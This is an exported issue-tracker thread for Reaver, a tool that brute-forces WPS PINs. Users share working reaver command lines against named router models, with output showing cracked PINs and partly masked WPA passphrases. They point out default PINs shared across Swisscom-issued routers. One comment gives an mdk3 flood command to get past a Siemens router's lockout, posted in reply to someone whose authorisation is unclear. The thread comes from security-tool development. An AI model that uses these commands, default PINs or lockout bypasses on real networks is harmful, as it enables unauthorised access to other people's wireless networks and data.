GoogleCodeExporter
commented
9 years ago The program shouldn't call home to send data without asking for user permission
though.Original comment by b1957...@nwldx.com on 5 Jan 2012 at 3:39
Open GoogleCodeExporter opened 9 years ago
GoogleCodeExporter
commented
9 years ago The program shouldn't call home to send data without asking for user permission
though.Original comment by b1957...@nwldx.com on 5 Jan 2012 at 3:39
GoogleCodeExporter
commented
9 years ago That's why the first line said "Allow the users the option...."Original comment by pinsb...@gmail.com on 5 Jan 2012 at 7:21
GoogleCodeExporter
commented
9 years ago Issue 96 has been merged into this issue.Original comment by cheff...@tacnetsol.com on 6 Jan 2012 at 3:52
GoogleCodeExporter
commented
9 years ago We're looking in to having an open source database where users can submit
settings and download the DB to be used with Reaver.Original comment by cheff...@tacnetsol.com on 6 Jan 2012 at 3:53
GoogleCodeExporter
commented
9 years ago Perfect, thanks guys.Original comment by pinsb...@gmail.com on 6 Jan 2012 at 4:18
GoogleCodeExporter
commented
9 years ago Backtrack 5v2 64bit
Atheros mini PCI ath9k
reaver v 1.4 r68
AP NetgearWNR 2000v2 E0:91:F5:60:xx:xx
Airodump signal -69 distance aprox 40m through window
command used:
reaver -i mon0 -b netgearsmacaddr -L -c 1 -a -d 0.2 -S -vv
-L was important because the AP locks for a random time but then continous
while reaver running, when reaver has found the first four digit it does not
lock anymore until the end.
-c was also important because the channel does not switch everytime during
lockstate but you have to observe the output and check the channel again
sometimes.
Original comment by patricks...@gmail.com on 6 Jan 2012 at 5:07
GoogleCodeExporter
commented
9 years ago [deleted comment]Backtrack 5v2 64bit
Atheros mini PCI ath9k
reaver v 1.4 r73
AP Linksys WRT120N 00:25:9C:E5:xx:xx
AP in same room
command used:
reaver -i mon0 -b linksysmacaddr -c 9 -vv
Walkthrough without problems, sometimes "Receive timout occurred"
Original comment by patricks...@gmail.com on 6 Jan 2012 at 10:13
GoogleCodeExporter
commented
9 years ago "That's why the first line said "Allow the users the option...." "
:D ... Whoops?Original comment by b1957...@nwldx.com on 6 Jan 2012 at 10:19
GoogleCodeExporter
commented
9 years ago On the same AP Linksys WRT120N like above
reaver -i mon0 -b linksysmacaddr -d 0.3 -t 1 -vv
Walkthrough with (1 seconds/attempts) some Receive timeouts but who cares it
runs faster.Original comment by patricks...@gmail.com on 7 Jan 2012 at 12:40
GoogleCodeExporter
commented
9 years ago I did run the same AP Linksys with same Hardware again doing interrupts and
starts between and it has recovered everthing well. May be this is the lucky
combination of success. But it did not work on a Belkin and ZyXEL AP. The main
part of the program is working correct, those errors could come from
syncronisation problems.Original comment by patricks...@gmail.com on 8 Jan 2012 at 1:44
GoogleCodeExporter
commented
9 years ago Original comment by cheff...@tacnetsol.com on 10 Jan 2012 at 5:56
GoogleCodeExporter
commented
9 years ago BT 5 r1 64bit
Atheros mini PCI ath9k
AP Broadband Solutions (Swisscom Router)
reaver 1.4 r97
signal -86
reaver -i mon0 -b 00:24:c9:73:xx:xx -a -c 1 -vv
positive attack
pin was a easy one 00005678
password found correctOriginal comment by patricks...@gmail.com on 16 Jan 2012 at 10:20
GoogleCodeExporter
commented
9 years ago @patrick: Ha! That's an awesome pin - probably not a coincidence. Makes me
wonder if other units/models from the same vendor have the same or similar pins.Original comment by cheff...@tacnetsol.com on 16 Jan 2012 at 10:54
GoogleCodeExporter
commented
9 years ago BT 5 r1 64bit
Atheros mini PCI ath9k
AP Pirelli Broadband Solutions (Swisscom Router)
reaver 1.4 r100
signal -88
reaver -i mon0 -b 64:87:D7:1B:xx:xx -a -c11 -vv
positive attack
pin 01230000
password recovered correct
@ Craig another hit with a simple pin. Its the same Manufacturer of AP but must
be a different model. I have such a lot of different Wlan adapters but it work
only with this one.Original comment by patricks...@gmail.com on 17 Jan 2012 at 12:19
GoogleCodeExporter
commented
9 years ago BT 5 r1 64bit
Atheros mini PCI ath9k
AP Broadband Solutions (Swisscom Router)
reaver 1.4 r100
signal -89
reaver -i mon0 -b 00:24:C9:8:xx:xx:xx -p 00005678 -c 6 -vv
[+] Pin cracked in 10 seconds
[+] WPS PIN: '00005678'
[+] WPA PSK: 'bo1w-oulv-xxxx-xxxx'
[+] AP SSID: 'PFx-40xxx'
------------------------------------------------------------
Another one
signal -87
AP Motorola (Swisscom)
reaver -i mon0 -b 00:26:42:xx:xx:xx -p 00005678 -c 11 -vv
[+] Pin cracked in 18 seconds
[+] WPS PIN: '00005678'
[+] WPA PSK: 'ykzk-csle-xxxx-xxxx'
[+] AP SSID: 'rix-33xxx'
I just went over to my friend for support and make a little test on his place
:-).
It seems to be that our Swisscom ISP are configuring standards into their AP's.
They have strong passwords but ..........
Not everything in switzerland is secure :-).Original comment by patricks...@gmail.com on 17 Jan 2012 at 2:19
GoogleCodeExporter
commented
9 years ago Patrick, that is awesome! I've added 00005678 as one of the first pins for
Reaver to attempt. :)Original comment by cheff...@tacnetsol.com on 17 Jan 2012 at 2:42
GoogleCodeExporter
commented
9 years ago Yes good job, and i was thinking that double zeros will not be used as first
digits,
what a wrong idea....Original comment by patricks...@gmail.com on 17 Jan 2012 at 2:45
GoogleCodeExporter
commented
9 years ago I thought so too myself, which is why I originally had Reaver randomizing the
pins. It's hard to account for human error though. :)Original comment by cheff...@tacnetsol.com on 17 Jan 2012 at 2:54
GoogleCodeExporter
commented
9 years ago what do you think of a enhancement of wash. When the output will have
the -b just in front of the BSSID so it is more easyer to copy and
paste to the reaver command.
Same would be possible for the Channel -c.
BSSID Channel ESSID RSSI WPS Version
----------------------------------------------------------
-b xz:xy:xy:xy:xy:xx -c 11 -e testap -22 1.0
you see the shortcut?
Original comment by patricks...@gmail.com on 17 Jan 2012 at 7:31
GoogleCodeExporter
commented
9 years ago in my area insight (cable provider) uses belkin routers. they have been
crackable but always in the last 10%, on all 4 so far lol. just my inputOriginal comment by entept...@gmail.com on 30 Jan 2012 at 1:05
GoogleCodeExporter
commented
9 years ago [deleted comment]hay guys!I have a problem, when I connect to a router, after a few minutes we
detected AP expel rate limiting, waiting 60 seconds before re-checking, so I
left a couple of hours but nothing happened. I tried all the commands that you
wrote this-but none helps .. always the same thing happens .. WPA2-PSK -
decryption
router is a Siemens SX763-I live in Croatia ..
please help you master, which is a little better understanding of linux and backtrack ..
ps. Latest bactrack 5 R2 x32 comes ...
Thanks in advance!Original comment by bahrijaz...@gmail.com on 8 Mar 2012 at 11:47
GoogleCodeExporter
commented
9 years ago run "mdk3 mon0 a -a XX:XX:XX:XX:XX:XX" for 2-3 minutes it will fool the siemens
and you continue with reaver until neccesary to repeat mdk3 commandOriginal comment by pozega.t...@gmail.com on 16 May 2012 at 7:17
GoogleCodeExporter
commented
9 years ago cheff how is the open source database goin? lamost waht 4 mmonth passed since
that Original comment by bersebu...@gmail.com on 20 May 2012 at 4:34
GoogleCodeExporter
commented
9 years ago any database yet? I would like toknow about thomson used inportugal for ISP meoOriginal comment by Tiago.Ge...@gmail.com on 26 Oct 2012 at 12:57
Original issue reported on code.google.com by
pinsb...@gmail.comon 5 Jan 2012 at 1:33